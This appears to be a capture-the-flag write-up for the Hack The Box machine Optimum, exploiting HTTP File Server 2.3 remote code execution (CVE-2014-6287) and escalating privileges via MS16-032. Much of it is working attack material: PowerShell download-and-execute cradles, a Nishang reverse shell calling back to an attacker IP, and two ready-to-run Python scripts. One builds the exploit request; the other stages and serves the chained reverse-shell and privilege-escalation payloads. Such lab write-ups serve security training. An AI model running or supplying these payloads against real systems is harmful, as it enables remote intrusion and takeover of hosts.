HTB Optimum Write-up (Windows) - Powershell Download String, HFS File Server 2.3 Vuln, Sherlock
- 1 liner
This exploit worked, but IppSec's walkthrough video does it in a better way.
HFS (HTTP File Server) is written by Rejetto and has its own built-in macro language.
Version 2.3 (the 2.3.x series) is vulnerable to remote code execution through that macro engine (CVE-2014-6287).
According to the HFS wiki page, we can execute commands with the following macro syntax:
exec | A
ask system to run file A, eventually with parameters. If you need to use the pipe, then use macro quoting.
Optional parameter out will let you capture the console output of the program in the variable specified by name.
Optional parameter timeout will specify the max number of seconds the app should be left running.
Note the pipe: it is the macro's argument separator, so any command containing one must be macro-quoted or it will be cut off.
We can confirm this by typing:
and set up tcpdump on the VPN interface to watch for traffic generated by the injected command:
tcpdump -i tun0
If that traffic shows up, the command ran and the box is exploitable.
Windows comes in 32-bit and 64-bit versions, and HFS is a 32-bit process. On 64-bit Windows the system paths a 32-bit process sees are redirected:
- C:\Windows\SysWow64 -> this is still 32-bit (it is where a 32-bit process lands when it asks for System32)
- C:\Windows\SysNative -> this is the real 64-bit System32, reachable from a 32-bit process only through this alias
So we will use the 64-bit PowerShell from SysNative.
Once confirmed, we can use the Nishang toolset: Shells > Invoke-PowerShellTcp.ps1. Copy it somewhere else, as we need to modify it a bit.
At the end of the script, add one line so the function is called as soon as the script is loaded:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.125 -Port 4444
And start an nc listener on the port specified.
Finally, we can download the file on the File Server by typing:
And now we get a user shell!
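The foothold above is a single HTTP request: the HFS exec macro runs the 64-bit PowerShell, which pulls the Nishang script from our web server and runs it in memory. As an added example (not from the write-up or from IppSec's video), here is a small Python helper that builds that request. The `/?search=` parameter and the leading `%00` are what the public exploit for CVE-2014-6287 sends and are not spelled out in the notes above; the target URL, attacker IP, port and script name are placeholders for your own lab values.

```python
import urllib.parse
import urllib.request

# Placeholder lab values (assumptions, not taken from the write-up).
TARGET = "http://10.10.10.8"      # HFS listens on the target's web port
ATTACKER_IP = "10.10.14.125"
HTTP_PORT = 80

# Path a 32-bit process (HFS) must use to reach the 64-bit PowerShell; a bare
# "powershell" would be redirected to the 32-bit copy under SysWOW64.
PS64 = r"C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe"


def hfs_search_query(command: str) -> str:
    """Build the path+query that makes HFS 2.3 run `command` via {.exec|...}.

    The leading %00 is what the public CVE-2014-6287 exploit sends: HFS stops
    the search string at the null byte and evaluates the macro that follows
    (assumption: this detail is not stated in the notes above).  The pipe is
    the macro argument separator, so a command containing one would need HFS
    macro quoting; this helper refuses it instead of silently truncating.
    """
    if "|" in command:
        raise ValueError("'|' ends the exec argument; use HFS macro quoting")
    # Percent-encode everything in the command (spaces, quotes, backslashes)
    # so the URL stays well-formed; HFS decodes it before evaluating the macro.
    return "/?search=%00{.exec|" + urllib.parse.quote(command, safe="") + ".}"


def ps64_cradle(ip: str, port: int, script: str) -> str:
    """64-bit PowerShell one-liner that fetches `script` from our HTTP server
    and runs it in memory (the DownloadString cradle used in the write-up)."""
    url = f"http://{ip}:{port}/{script}"
    return f"{PS64} IEX(New-Object Net.WebClient).DownloadString('{url}')"


def send(target: str, command: str, timeout: float = 5.0) -> int:
    """Fire the request and return the HTTP status.  HFS answers the search
    page normally either way, so the status says nothing about whether the
    command ran: watch tcpdump, the HTTP server log or the nc listener."""
    with urllib.request.urlopen(target + hfs_search_query(command), timeout=timeout) as r:
        return r.status


if __name__ == "__main__":
    # Step 1: confirm RCE by having the target ping us (watch: tcpdump -i tun0 icmp).
    print(TARGET + hfs_search_query(f"ping -n 1 {ATTACKER_IP}"))
    # Step 2: pull the Nishang reverse shell with the 64-bit PowerShell.
    print(TARGET + hfs_search_query(ps64_cradle(ATTACKER_IP, HTTP_PORT, "shell.ps1")))
```

The script only prints the two URLs by default; call `send(TARGET, ...)` once nc and the HTTP server are up. Keeping the command out of the URL's reserved characters matters more than it looks: a raw space or quote in the query is exactly what makes "it worked in the browser but not from the script" bugs.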
The same download-and-execute method can be used to fetch privilege escalation scripts.
Since we are already running PowerShell on the server, let's use Sherlock, a PowerShell script that checks the host for missing patches.
Edit the Sherlock script and add the function we want to run at the end of it:
In this case, Find-AllVulns
Sherlock reports the host is missing patches for three exploits:
- MS16-032, MS16-034, MS16-135
At the end of the Invoke-MS16032 script, add:
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.119.188:80/shell.ps1')"
Copy the Nishang TCP reverse shell script into the same directory, edit its port to something other than the one used for the first shell (that nc listener is still occupying it), and start a Python HTTP server to host both files.
Start nc on the new port before running the exploit.
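Every stage on this box follows the same pattern: append a call to the end of a PowerShell script, host it, and let the target IEX it. The step that is easy to get wrong is the port for the second shell, which must differ from the first listener's. As an added example (not part of the write-up, and not code from Nishang, Sherlock or the Invoke-MS16032 script), the Python below prepares the hosting directory from local copies of those three scripts, refuses a reused port, and serves the result. The attacker IP, ports and file names are placeholders.

```python
import functools
import http.server
import os

# Placeholder lab values (assumptions, not taken from the write-up).
ATTACKER_IP = "10.10.14.125"
HTTP_PORT = 80


def append_invocation(script: str, invocation: str) -> str:
    """Return `script` with `invocation` as its last line, so that IEX of the
    downloaded text defines the function and immediately calls it.  Does not
    add the line twice if the script already ends with it."""
    body = script.rstrip("\r\n")
    if body.split("\n")[-1] == invocation:
        return body + "\n"
    return body + "\n" + invocation + "\n"


def download_cradle(ip: str, port: int, script_name: str) -> str:
    """The in-memory download-and-execute one-liner used throughout the box."""
    return f"iex(New-Object Net.WebClient).DownloadString('http://{ip}:{port}/{script_name}')"


def build_stage(nishang_tcp: str, sherlock: str, invoke_ms16032: str,
                ip: str = ATTACKER_IP, http_port: int = HTTP_PORT,
                shell_port: int = 4444, privesc_port: int = 4445):
    """Return (files, listener_ports): file name -> script text for everything
    the HTTP server will host, plus the nc ports that must be open first.

    The nc listener for the first shell is still attached when the MS16-032
    payload runs, so the second Nishang shell must call back to a different
    port.  That is the mistake the write-up warns about, so it is rejected.
    """
    if shell_port == privesc_port:
        raise ValueError("second reverse shell must use a port other than the first listener's")
    shell = "Invoke-PowerShellTcp -Reverse -IPAddress {} -Port {}"
    files = {
        "shell.ps1": append_invocation(nishang_tcp, shell.format(ip, shell_port)),
        "sherlock.ps1": append_invocation(sherlock, "Find-AllVulns"),
        "shell2.ps1": append_invocation(nishang_tcp, shell.format(ip, privesc_port)),
        "ms16032.ps1": append_invocation(
            invoke_ms16032,
            f'Invoke-MS16032 -Command "{download_cradle(ip, http_port, "shell2.ps1")}"'),
    }
    return files, sorted({shell_port, privesc_port})


def write_stage(files: dict, out_dir: str) -> None:
    """Write the prepared scripts with LF endings into the hosting directory."""
    os.makedirs(out_dir, exist_ok=True)
    for name, text in files.items():
        with open(os.path.join(out_dir, name), "w", newline="\n") as fh:
            fh.write(text)


def serve(out_dir: str, port: int = HTTP_PORT) -> None:
    """Equivalent of `python3 -m http.server` rooted at out_dir; the request
    log shows which script the target fetched and when."""
    handler = functools.partial(http.server.SimpleHTTPRequestHandler, directory=out_dir)
    with http.server.ThreadingHTTPServer(("", port), handler) as httpd:
        httpd.serve_forever()


if __name__ == "__main__":
    # Source scripts are read from local copies (paths are placeholders).
    srcs = [open(p).read() for p in ("Invoke-PowerShellTcp.ps1", "Sherlock.ps1", "Invoke-MS16032.ps1")]
    files, listeners = build_stage(*srcs)
    write_stage(files, "www")
    print("start nc -lvnp on each of:", listeners)
    serve("www")
```

Order of operations when using it: start the nc listeners on the ports it prints, start `serve`, then trigger `sherlock.ps1` and `ms16032.ps1` from the existing user shell with the same DownloadString cradle. `ms16032.ps1` is the only one that chains: its appended line downloads `shell2.ps1`, which is why that file must already be in the directory and call back to the second port.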